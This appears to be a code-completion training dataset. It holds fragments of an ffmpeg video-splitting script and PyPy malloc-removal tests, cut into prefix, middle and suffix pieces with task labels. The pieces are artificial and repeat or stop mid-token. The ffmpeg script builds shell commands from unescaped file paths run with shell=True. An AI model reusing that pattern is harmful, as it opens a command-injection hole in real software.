dt_start, dt_end, dt_diff = input_video.GetTimeRange( time_range_number )
time_start = str(dt_start)
time_end = str(dt_end)
time_diff = str(dt_diff)
video_len = GetVideoLength(input_video.abspath)
if video_len < dt_start:
raise Exception( "start time bad" )
ffmpeg_command = [
ffmpeg_bin + "ffmpeg",
"-y -hide_banner",
"-ss " + time_start,
'-i "' + input_video.abspath + '"',
"-map 0:v"
]
# get audio track count
audio_tracks = GetAudioTrackCount(input_video.abspath)
if final_encode:
ffmpeg_command.append("-c:v libx265")
ffmpeg_command.append("-crf 8")
ffmpeg_command.append("-preset slow")
else:
ffmpeg_command.append("-c:v libx264")
ffmpeg_command.append("-crf 24")
ffmpeg_command.append("-preset ultrafast")
# TODO: make sure the output colors are not messed up with this
# shadowplay color range: Limited
# shadowplay color primaries: BT.601 NTSC
# shadowplay color space: YUV
# shadowplay standard: PAL
# what does this do?
# "-h full"
# this stretches the color range i think, so it looks
|
# you might not be able to get a date modified due to no input videos being added, oof
|
random_line_split
|
ffmpeg_video_splitter.py
|
Command(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.filter_complex_list.append(filter_complex_option)
def GetTimeDiff(dt_start, dt_end):
time_difference = dt_end.total_seconds() - dt_start.total_seconds()
if time_difference <= 0:
raise Exception("Time difference less than 0: " + str(time_difference))
return datetime.timedelta(seconds=time_difference)
def ConvertTimestampToTimeDelta(timestamp_str):
time_split = timestamp_str.split(":")
time_split.reverse()
total_seconds = float(time_split[0])
for index in range(1, len(time_split)):
total_seconds += int(time_split[index]) * (60 ** index)
time_dt = datetime.timedelta(seconds=total_seconds)
return time_dt
def ConvertToDateTime(datetime_str):
date, time = datetime_str.split(" ", 1)
year, month, day = date.split('-')
hour, minute, second = time.split('-')
date_time = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))
return date_time
def
|
(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def RemoveDirectory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
def DeleteFile( path ):
try:
os.remove(path)
except FileNotFoundError:
pass
def ParseConfig( config_blocks, base_output_folder, config_folder ):
if verbose:
print( "Parsing Config" )
full_root_folder = config_folder
full_output_folder = base_output_folder
force_file_ext = False
time_stamp = None
video_list = []
for block_obj in config_blocks:
if block_obj.key == "$base_output_folder" or block_obj.key == "$output_folder":
base_output_folder = os.path.normpath( block_obj.value ) + os.sep
full_output_folder = base_output_folder
elif block_obj.key == "$append_output_folder":
if os.path.isabs( block_obj.value ):
full_output_folder = os.path.normpath( block_obj.value )
else:
full_output_folder = os.path.normpath( base_output_folder + block_obj.value )
elif block_obj.key == "$force_file_ext":
force_file_ext = block_obj.value
elif block_obj.key == "$include":
include_config = lexer.ReadFile(block_obj.value)
config_path = os.path.join(full_root_folder, os.path.split(block_obj.value)[0])
include_video_list, base_output_folder = ParseConfig(include_config, base_output_folder, config_path)
video_list.extend(include_video_list)
elif block_obj.key in {"$input_video_folder", "$input_folder"}:
if os.path.isabs( block_obj.value ):
full_root_folder = os.path.normpath( block_obj.value ) + os.sep
else:
full_root_folder = os.path.normpath( config_folder + block_obj.value ) + os.sep
# is a video file
else:
video_file = VideoFile( block_obj.key, full_root_folder, config_folder,
full_output_folder, force_file_ext )
if block_obj.items:
AddInputVideosToVideo( video_file, block_obj )
video_list.append(video_file)
video_file.crc_list.append(GetCRC(base_output_folder))
video_file.crc_list.append(GetCRC(str(final_encode)))
if not os.path.isfile(video_file.full_path):
continue
elif not CheckCRC(video_file, video_file.crc_list):
video_file.skip = True
return video_list, base_output_folder
def AddInputVideosToVideo( video_file, block_obj ):
for input_video_block in block_obj.items:
crc_list = []
input_video_block.key = os.path.normpath( input_video_block.key )
if input_video_block.key == "$time":
# TODO: maybe if the value is 'self', use the input video date modified?
# you might not be able to get a date modified due to no input videos being added, oof
# and what if there is more than one video?
time_stamp = ConvertToDateTime(input_video_block.value)
video_file.time = time_stamp
elif input_video_block.key == "$ffmpeg_cmd":
video_file.global_ffmpeg_cmd.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif input_video_block.key == "$no_filter_complex_default":
video_file.use_filter_complex_default = False
elif input_video_block.key == "$filter_complex":
video_file.global_filter_complex.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif ":" in input_video_block.key and not os.sep in input_video_block.key:
video_file.AddInputVideo( video_file.raw_path )
crc_list.append( GetCRC(video_file.raw_path) )
crc_list = AddInputVideoSetting( video_file, input_video_block, crc_list )
else:
video_file.AddInputVideo(input_video_block.key, False)
for in_video_item in input_video_block.items:
crc_list = AddInputVideoSetting( video_file, in_video_item, crc_list )
video_file.crc_list.extend( crc_list )
return
def AddInputVideoSetting( video_file, in_video_item, crc_list ):
if in_video_item.key == "$ffmpeg_cmd":
video_file.AddFFMpegCommand(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
elif in_video_item.key == "$filter_complex":
video_file.AddFFMpegFilterComplex(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
else:
video_file.AddTimeRange(in_video_item.key, in_video_item.value)
crc_list.append(GetCRC(in_video_item.key))
crc_list.append(GetCRC(in_video_item.value))
return crc_list
# some shitty thing to print what we just parsed
def PrintTimestampsFile( video_list, out_folder ):
cmd_bar_line = "-----------------------------------------------------------"
print( cmd_bar_line )
if verbose:
print( "Timestamps File" )
print( cmd_bar_line )
for out_video in video_list:
print( out_video.path )
for in_video in out_video.input_videos:
print( " " + in_video.raw_path )
for time_range in in_video.time_ranges:
print( " " + str(time_range[0]) + " - " + str(time_range[1]) )
print( "" )
print( "Default Output Folder: " + out_folder )
if final_encode:
print( "Final Encode - Using H265 - CRF 8 - Slow Preset" )
else:
print( "Quick Encode - Using H264 - CRF 24 - Ultrafast Preset" )
print( cmd_bar_line )
return
def RunFFMpegConCat(temp_path, sub_video_list, out_video):
# stuff for ffmpeg concat shit
temp_file = temp_path + "temp.txt"
with open(temp_file, "w", encoding="utf-8") as temp_file_io:
for sub_video in sub_video_list:
temp_file_io.write("file '" + sub_video + "'\n")
metadata = []
if out_video.time:
metadata.append('-metadata date="' + str(out_video.time).replace(':', '-') + '"')
ffmpeg_command = (
ffmpeg_bin + "ffmpeg -y -hide_banner",
"-safe 0 -f concat -i \"" + temp_file + '"',
"-c copy -map 0",
*metadata,
'"' + out_video.full_path + '"'
)
RunFFMpeg(out_video.full_path, ' '.join(ffmpeg_command))
if verbose:
print("Created Output Video")
if out_video.time:
ReplaceDateModified(out_video.full_path, out_video.time.timestamp())
if verbose:
print("Changed Date Modified")
os.remove(temp_file)
def RunFFMpegSubVideo( time_range_number, input_video, temp_video, use_filter_complex_default ):
dt_start, dt_end, dt_diff = input_video.GetTimeRange( time_range_number )
time_start = str(dt_start)
time_end = str(dt_end)
time_diff = str(dt_diff)
video_len = GetVideoLength(input_video.abspath)
if video_len < dt_start:
raise Exception( "start time bad" )
ffmpeg_command = [
ffmpeg_bin + "ffmpeg",
"-y -hide_banner",
"-ss " + time_start,
'-i "' + input_video.abspath + '"',
"-map 0:v"
]
# get audio track count
audio_tracks = GetAudioTrackCount(input_video.abspath)
if final_encode:
ffmpeg_command.append("-c:v libx265")
ffmpeg_command.append("-crf 8")
ffmpeg_command.append("-preset slow")
else:
ffmpeg_command.append("-c:v libx264")
ffmpeg_command.append("-crf 24")
ffmpeg_command.append("-preset ultrafast")
# TODO: make sure the output colors are not messed up with this
# shadowplay color range: Limited
# shadowplay color primaries: BT.601 NTSC
# shadowplay color space: YUV
# shadowplay standard: PAL
# what does this do?
# "-h full"
# this stretches the color range i think, so it looks
|
CreateDirectory
|
identifier_name
|
ffmpeg_video_splitter.py
|
def FindCommand( arg, short_arg ):
found = FindItemInList(sys.argv, arg, False)
if not found:
found = FindItemInList(sys.argv, short_arg, False)
return found
def FindCommandValue( arg, short_arg ):
value = FindItemInList(sys.argv, arg, True)
if not value:
value = FindItemInList(sys.argv, short_arg, True)
return value
# ok, what the fuck am i doing with all these paths?
class VideoFile:
def __init__(self, filename, root_folder, config_folder, output_folder, force_file_ext):
self.output_folder = output_folder
self.raw_path = os.path.normpath(filename)
self.path = os.path.normpath(output_folder + os.sep + filename)
if force_file_ext:
prefix = os.path.splitext(self.path)[0]
if "." not in force_file_ext:
force_file_ext = "." + force_file_ext
self.path = os.path.normpath( prefix + force_file_ext )
if os.sep in self.path:
self.filename = self.path.rsplit( os.sep, 1 )[1]
else:
self.filename = self.path
if os.path.isabs( output_folder ):
self.full_path = self.path
else:
self.full_path = os.path.normpath( config_folder + self.path )
self.full_output_path = self.full_path.rsplit( os.sep, 1 )[0] + os.sep
self.root_config_folder = config_folder
self.root_video_folder = root_folder
self.input_videos = []
self.time = None
self.global_ffmpeg_cmd = []
self.global_filter_complex = []
self.skip = False # this will be set to true if the crc check fails
self.crc_list = []
# dumb temp thing that will be here for 40 years
self.use_filter_complex_default = True
def AddInputVideo(self, input_video_filename, check=True):
if os.path.isabs( input_video_filename ):
full_input_video_path = input_video_filename
else:
full_input_video_path = os.path.normpath(self.root_video_folder + input_video_filename)
if check:
for input_video_obj in self.input_videos:
if full_input_video_path == input_video_obj.abspath:
return
input_video = InputVideoFile( input_video_filename, self.root_video_folder, self.root_config_folder )
input_video.ffmpeg_cmd_line.extend(self.global_ffmpeg_cmd)
input_video.filter_complex_list.extend(self.global_filter_complex)
self.input_videos.append( input_video )
def AddTimeRange(self, start, end):
# maybe i should use a filename and get the index instead? idk
input_video = self.input_videos[-1]
input_video.AddTimeRange(start, end)
def AddFFMpegCommand(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.input_videos[-1].ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.input_videos[-1].filter_complex_list.append(filter_complex_option)
class InputVideoFile:
def __init__(self, filename, root_folder, config_folder):
if os.path.isabs(filename):
self.abspath = os.path.normpath( filename )
else:
self.abspath = os.path.normpath( root_folder + filename )
self.filename = os.path.basename(self.abspath)
# bad idea?
if os.path.isabs(filename):
self.raw_path = os.path.normpath(filename)
else:
append_folder = ''.join( root_folder.split( config_folder, 1 ) )
self.raw_path = os.path.normpath(append_folder + filename)
self.time_ranges = []
self.ffmpeg_cmd_line = []
self.filter_complex_list = []
def AddTimeRange(self, start, end):
self.time_ranges.append([ConvertTimestampToTimeDelta(start), ConvertTimestampToTimeDelta(end)])
def GetTimeRange(self, list_index):
dt_start = self.time_ranges[list_index][0]
dt_end = self.time_ranges[list_index][1]
dt_diff = GetTimeDiff(dt_start, dt_end)
return dt_start, dt_end, dt_diff
def AddFFMpegCommand(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.filter_complex_list.append(filter_complex_option)
def GetTimeDiff(dt_start, dt_end):
time_difference = dt_end.total_seconds() - dt_start.total_seconds()
if time_difference <= 0:
raise Exception("Time difference less than 0: " + str(time_difference))
return datetime.timedelta(seconds=time_difference)
def ConvertTimestampToTimeDelta(timestamp_str):
time_split = timestamp_str.split(":")
time_split.reverse()
total_seconds = float(time_split[0])
for index in range(1, len(time_split)):
total_seconds += int(time_split[index]) * (60 ** index)
time_dt = datetime.timedelta(seconds=total_seconds)
return time_dt
def ConvertToDateTime(datetime_str):
date, time = datetime_str.split(" ", 1)
year, month, day = date.split('-')
hour, minute, second = time.split('-')
date_time = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))
return date_time
def CreateDirectory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def RemoveDirectory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
def DeleteFile( path ):
try:
os.remove(path)
except FileNotFoundError:
pass
def ParseConfig( config_blocks, base_output_folder, config_folder ):
if verbose:
print( "Parsing Config" )
full_root_folder = config_folder
full_output_folder = base_output_folder
force_file_ext = False
time_stamp = None
video_list = []
for block_obj in config_blocks:
if block_obj.key == "$base_output_folder" or block_obj.key == "$output_folder":
base_output_folder = os.path.normpath( block_obj.value ) + os.sep
full_output_folder = base_output_folder
elif block_obj.key == "$append_output_folder":
if os.path.isabs( block_obj.value ):
full_output_folder = os.path.normpath( block_obj.value )
else:
full_output_folder = os.path.normpath( base_output_folder + block_obj.value )
elif block_obj.key == "$force_file_ext":
force_file_ext = block_obj.value
elif block_obj.key == "$include":
include_config = lexer.ReadFile(block_obj.value)
config_path = os.path.join(full_root_folder, os.path.split(block_obj.value)[0])
include_video_list, base_output_folder = ParseConfig(include_config, base_output_folder, config_path)
video_list.extend(include_video_list)
elif block_obj.key in {"$input_video_folder", "$input_folder"}:
if os.path.isabs( block_obj.value ):
full_root_folder = os.path.normpath( block_obj.value ) + os.sep
else:
full_root_folder = os.path.normpath( config_folder + block_obj.value ) + os.sep
# is a video file
else:
video_file = VideoFile( block_obj.key, full_root_folder, config_folder,
full_output_folder, force_file_ext )
if block_obj.items:
AddInputVideosToVideo( video_file, block_obj )
video_list.append(video_file)
video_file.crc_list.append(GetCRC(base_output_folder))
video_file.crc_list.append(GetCRC(str(final_encode)))
if not os.path.isfile(video_file.full_path):
continue
elif not CheckCRC(video_file, video_file.crc_list):
video_file.skip = True
return video_list, base_output_folder
def AddInputVideosToVideo( video_file, block_obj ):
for input_video_block in block_obj.items:
crc_list = []
input_video_block.key = os.path.normpath( input_video_block.key )
if input_video_block.key == "$time":
# TODO: maybe if the value is 'self', use the input video date modified?
# you might not be able to get a date modified due to no input videos being added, oof
# and what if there is more than one video?
time_stamp = ConvertToDateTime(input_video_block.value)
video_file.time = time_stamp
elif input_video_block.key == "$ffmpeg_cmd":
video_file.global_ffmpeg_cmd.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif input_video_block.key == "$no_filter_complex_default":
video_file.use_filter_complex_default = False
elif input_video_block.key == "$filter_complex":
video_file.global_filter_complex.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif ":" in input_video_block.key and not os.sep in input_video_block.key:
video_file.AddInputVideo( video_file.raw_path )
crc_list.append( GetCRC(video_file.raw_path) )
crc_list = AddInputVideoSetting( video_file, input_video_block, crc_list )
else:
video_file.AddInputVideo(input_video_block.key,
|
if item in search_list:
if return_value:
return search_list[search_list.index(item) + 1]
else:
return True
else:
return False
|
identifier_body
|
|
ffmpeg_video_splitter.py
|
8")
ffmpeg_command.append("-preset slow")
else:
ffmpeg_command.append("-c:v libx264")
ffmpeg_command.append("-crf 24")
ffmpeg_command.append("-preset ultrafast")
# TODO: make sure the output colors are not messed up with this
# shadowplay color range: Limited
# shadowplay color primaries: BT.601 NTSC
# shadowplay color space: YUV
# shadowplay standard: PAL
# what does this do?
# "-h full"
# this stretches the color range i think, so it looks like fucking shit with limited color range
# ffmpeg_command.append("-vf scale=in_range=limited:out_range=full")
# ffmpeg_command.append("-vf colormatrix bt709")
# Filter complex stuff here:
filter_complex = []
# this is really just a hardcoded hack since this is what i use it for lmao
if use_filter_complex_default:
if audio_tracks == 5 or audio_tracks == 4:
filter_complex.append("[0:a:1][0:a:2]amerge[audio_combine]")
elif audio_tracks == 2:
filter_complex.append("[0:a:0][0:a:1]amerge[audio_combine]")
else:
ffmpeg_command.append("-map 0:a")
else:
ffmpeg_command.append("-map 0:a")
filter_complex += input_video.filter_complex_list
if filter_complex:
ffmpeg_command.append( '-filter_complex "' + ';'.join(filter_complex) + '"' )
if use_filter_complex_default and (audio_tracks == 5 or audio_tracks == 4 or audio_tracks == 2):
ffmpeg_command.append( "-map \"[audio_combine]\"" )
# TODO: maybe move these hard coded colorspace things to maybe a color command in the config?
# $colors "full" / "limited"
if audio_tracks == 5:
ffmpeg_command.append("-pix_fmt yuvj420p")
elif audio_tracks == 4 or audio_tracks == 2:
# Shadowplay - PAL - bad colors:
ffmpeg_command.append("-colorspace bt470bg -color_primaries bt470bg -color_trc gamma28")
# NTSC - OBS?:
# ffmpeg_command.append("-colorspace smpte170m -color_primaries smpte170m -color_trc smpte170m")
# TODO: test this on newer clips with full color range
# i do notice very minor color changes with this from limited to full
# doesn't do anything?
# ffmpeg_command.append("-pix_fmt yuvj420p")
# ffmpeg_command.append("-pix_fmt yuv420p")
ffmpeg_command.append("-c:a libvorbis")
# This is a bug in ffmpeg, so im using libvorbis for now until this is fixed
# ffmpeg_command.append("-c:a libopus")
ffmpeg_command.append("-b:a 192k")
ffmpeg_command.append("-t " + time_diff)
# any custom commands
ffmpeg_command.extend( input_video.ffmpeg_cmd_line )
# output file
ffmpeg_command.append('"' + temp_video + '"')
total_frames = GetTotalFrameCount( dt_diff, GetFrameRate(input_video.abspath) )
if verbose:
print("Start: " + time_start + " - End: " + time_end)
print("Total Frames: " + str(total_frames))
RunFFMpeg(temp_video, ' '.join(ffmpeg_command), total_frames)
return
def GetFrameRate( video_path ):
command = (
ffmpeg_bin + "ffprobe",
"-v 0",
"-of csv=p=0",
"-select_streams v:0",
"-show_entries stream=r_frame_rate",
'"' + video_path + '"'
)
output = subprocess.check_output(' '.join(command), shell=True)
output = str(output).replace("\\r", "").replace("\\n", "").replace("\'", "")[1:]
numerator, denominator = output.split( "/" )
frame_rate = int(numerator) / int(denominator)
return frame_rate
def GetTotalFrameCount( dt_time_length, frame_rate ):
return dt_time_length.total_seconds() * frame_rate
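# Worked example (illustrative values): ffprobe reports r_frame_rate as a fraction
# such as "60/1", so GetFrameRate returns 60.0, and a 10-second time range then
# gives GetTotalFrameCount(...) == 600 frames for the progress bar.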
def RunFFMpeg( out_file, cmd, total_frames=None ):
if raw_ffmpeg:
subprocess.run( cmd )
if not os.path.isfile(out_file) or os.path.getsize(out_file) == 0:
raise Exception("ffmpeg died")
else:
ffmpeg_run = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if total_frames:
UpdateProgressBar( 0.00, 52 ) # start it at 0
ffmpeg_output = ''
for line in ffmpeg_run.stdout:
ffmpeg_output += line
if total_frames:
if "frame=" in line:
# use the total time range and divide it by ffmpeg's current time in the encode to get a percentage
current_frame = line.split("frame= ")[1].split(" fps=")[0]
percentage = GetPercent( int(current_frame), total_frames, 2 )
UpdateProgressBar( percentage, 52 )
# TODO: IDEA: replace the progress bar with "\n" once it's done?
if total_frames:
UpdateProgressBar(100.0, 52) # usually it finishes before we can catch the last frame
if not os.path.isfile(out_file) or os.path.getsize(out_file) == 0:
print()
raise Exception("ffmpeg died - output:\n\n" + ffmpeg_output)
def GetPercent( current_frame, total_frames, round_num ):
return round(( current_frame / total_frames ) * 100, round_num)
def UpdateProgressBar( percentage, width ):
block = int(round(width * (percentage / 100)))
text = "\r{0} {1}%".format( "█" * block + "░"*( width - block ), percentage )
sys.stdout.write( text )
sys.stdout.flush()
def GetAudioTrackCount( video ):
ffprobe_command = (
ffmpeg_bin + "ffprobe",
"-loglevel error",
"-show_entries stream=codec_type",
"-of csv=p=0",
'"' + video + '"',
)
output = subprocess.check_output( ' '.join( ffprobe_command ), shell=True )
# now clean up that output and shove it into a list
stream_list = str( output ).split( "\\n" )
audio_tracks = 0
for stream in stream_list:
if "audio" in stream:
audio_tracks += 1
return audio_tracks
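# Worked example (illustrative output): for a recording with one video track and two
# audio tracks, ffprobe prints "video", "audio", "audio" (one codec_type per stream),
# so GetAudioTrackCount returns 2 and the amerge branch in RunFFMpegSubVideo is used.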
def GetVideoLength(video):
ffprobe_command = ffmpeg_bin + \
"ffprobe -threads 6 -v error -show_entries format=duration " \
"-of default=noprint_wrappers=1:nokey=1 \"" + video + '"'
output = subprocess.check_output(ffprobe_command, shell=True)
# clean up the output
str_video_length = str(output).split("\\n")[0].split("\\r")[0].split("b\'")[1]
if str_video_length == "N/A":
return None
return ConvertTimestampToTimeDelta(str_video_length)
def StartEncodingVideos( video_list ):
temp_folder = "TEMP" + os.sep + str(datetime.datetime.now()) + os.sep
temp_folder = temp_folder.replace(":", "-").replace(".", "-")
temp_path = root_folder + temp_folder
CreateDirectory(temp_path)
for output_video in video_list:
if output_video.skip:
continue
print(output_video.path)
temp_video_list = []
temp_video_num = 0
for input_video in output_video.input_videos:
print("\nInput: " + input_video.filename)
time_range_number = 0
while time_range_number < len(input_video.time_ranges):
temp_video = temp_path + str(temp_video_num) + ".mkv"
temp_video_list.append( temp_video )
RunFFMpegSubVideo(time_range_number, input_video, temp_video, output_video.use_filter_complex_default)
time_range_number += 1
temp_video_num += 1
if time_range_number < len(input_video.time_ranges):
print()
print()
CreateDirectory( output_video.full_output_path )
# now combine all the sub videos together
RunFFMpegConCat(temp_path, temp_video_list, output_video)
print()
MakeCRCFile(output_video.filename, output_video.crc_list)
print("-----------------------------------------------------------")
RemoveDirectory(temp_path) # TODO: has an issue on linux
return
def CheckCRC( video_obj, crc_list ):
if verbose:
print( "Checking Hash: " + video_obj.filename + ".crc" )
video_crc_path = os.path.join( root_folder, "crcs", video_obj.filename + ".crc" )
if os.path.isfile(video_crc_path):
with open(video_crc_path, mode="r", encoding="utf-8") as file:
crc_file = file.read().splitlines()
valid_crcs = []
for video_crc in crc_file:
if video_crc not in crc_list:
# print("Invalid Hash: " + video_obj.filename + ".crc")
retu
|
rn True
|
conditional_block
|
|
test_malloc.py
|
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
t = x-y, x+y
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
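# Sanity check (illustrative arithmetic): with x=15, y=10 the branch builds t = (25, 5),
# so s*d == 125, which is the expected_result passed to self.check(); the point of the
# test is that the tuple itself gets malloc-removed.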
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
pass
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def
|
(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
self.addr = llmemory.raw_malloc(SIZE)
def __del__(self):
llmemory.raw_free(self.addr)
class B:
pass
def myfunc():
b = B()
b.keep = A()
b.data = llmemory.cast_adr_to_ptr(b.keep.addr, PARRAY)
b.data[0] = 42
ptr = b.data
# normally 'b' could go away as early as here, which would free
# the memory held by the instance of A in b.keep...
res = ptr[0]
# ...so we explicitly keep 'b' alive until here
objectmodel.keepalive_until_here(b)
return res
graph = self.check(myfunc, [], [], 42,
must_be_removed=False) #
|
test_direct_fieldptr_2
|
identifier_name
|
test_malloc.py
|
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
t = x-y, x+y
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
|
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
